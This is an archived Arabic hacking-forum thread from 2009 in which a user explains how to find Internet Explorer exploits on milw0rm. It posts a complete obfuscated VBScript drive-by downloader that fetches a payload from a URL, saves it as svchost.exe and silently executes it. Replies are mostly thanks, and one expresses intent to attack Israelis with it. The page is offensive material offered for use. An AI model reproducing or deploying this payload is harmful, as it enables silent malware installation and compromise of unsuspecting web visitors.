المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : حصري من hellwaheeb شرح كيفيت جالب ثغرات المتصفح من مواقع السكيروتي واستغلاله



hellwaheeb
08-15-2009, 07:39 PM
بسم الله الرحمن الرحيم

ا
( كفيت جالب ثغرات المتصفح من مواقع السكيروتي )

وانا شرحت له كيف في موضوع لكن انا عملت الموضوع هذا حتى الكل يعرف كيف

-----------------------------------------------------------------------------
اول شي ندخل الى رابط التالي

milw0rm - exploits : vulnerabilities : videos : papers : shellcode (http://www.milw0rm.com/search.php)

ونكتب في فارغ البحث

( Internet Explorer )

اوك الحين رح تطلع لنه جميع الثغرات الموجوده في وطبعن في عنا انواع الستغلال ثغرت

منه عن طريق رابط سيرفر ومنه عن طريق شل كود

مثل على ثغرة لي تتطلب منا شل كود

MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (fast) (http://www.milw0rm.com/exploits/8152)

ومثل لتي تطلب منا رابط سيرفر

كود PHP:

<html>
<title></title>
<script language=VBScript>
on error resume next

dl=هنــا الباتش المباشر
j1=clsid:
j2=BD96C556-
j3=65A3-
j4=11D0-
j5=983A-
j6=00C04FC29E36
j7=j1&j2&j3&j4&j5&j6
xx=object
xxx=classid
xxxx=Scripting.FileSystemObject
dd=open
Set df = document.createElement(xx)
df.setAttribute xxx, j7
b4=Mi
b5=cr
b6=o
b7=soft
b8=.X
b9=M
b10=L
b11=H
b12=T
b13=T
b14=P
strb1=b4&b5&b6&b7&b8&b9
strb2=b10&b11&b12&b13&b14
strb=strb1&strb2
Set x = df.CreateObject(strb,)
a4=A
a5=d
a6=o
a7=d
a8=b
a9=.
a10=S
a11=t
a12=r
a13=e
a14=a
a15=m
strd1=a4&a5&a6&a7&a8&a9
strd2=a10&a11&a12&a13&a14&a15
strd=strd1&strd2
set SS = df.createobject(strd,)
SS.type = 1
f4=G
f5=E
f6=T
stre=f4&f5&f6
x.Open stre, dl, False
x.Send
marco1=svchost.exe
set F = df.createobject(xxxx,)
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.savetofile marco1,2
SS.close
z1=She
z2=ll.A
z3=ppli
z4=cat
z5=io
z6=n
zz=z1&z2&z3&z4&z5&z6
set Q = df.createobject(zz,)
Q.ShellExecute marco1,,,dd,0
</script>
<head>
<title></title>
</head><body>
</body></html>
ومثل لتي يكون استغلال عن طريق لغة بيثون

MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (py) (http://www.milw0rm.com/exploits/8080)

وهي تكون في بدية #!/usr/bin/env python

=================================
اخوكم بالله

hellwaheeb

ملاحظة : ثغرة لي انا حطه شغاله على 7
================================
اضن كل شي واضح واي استفسار انا تحت امركم

BLACK.JaGuAr
08-15-2009, 10:27 PM
مشكور ياغالي يعطيك العافيه

hellwaheeb
08-16-2009, 12:53 AM
مشكور ياغالي يعطيك العافيه


مشكور على مرورك الغالى

Abdullhadi JC
09-05-2010, 12:06 AM
شكرا يا غالي وبارك الله فيك

Mr.EXIT.
09-05-2010, 02:06 AM
اخوي تاكد من الرابط

sTeEeF-511
09-05-2010, 02:48 AM
بيض الله وجهك وما قصرت
ايه الحين صارة الشهيه عندي مفتووح
والله ثم والله اني ما اخلي اسرئيلي في حاله>الخنازير<
تقبل مروري البسيط

back-connect
09-05-2010, 03:44 AM
يا اخوان هذي الثغره قديمه مره ولا تفع في الوقت الحالي
بتوفيق

teto2042
09-05-2010, 07:40 AM
تحياتى لك يا اخى
تقبل مرورى بس فى افضل من دى
بكتيييييييير جدا تحياتى لك
مــحــ تيتو ــمــد

Spy4Man
09-05-2010, 11:07 AM
يعطيك العافيه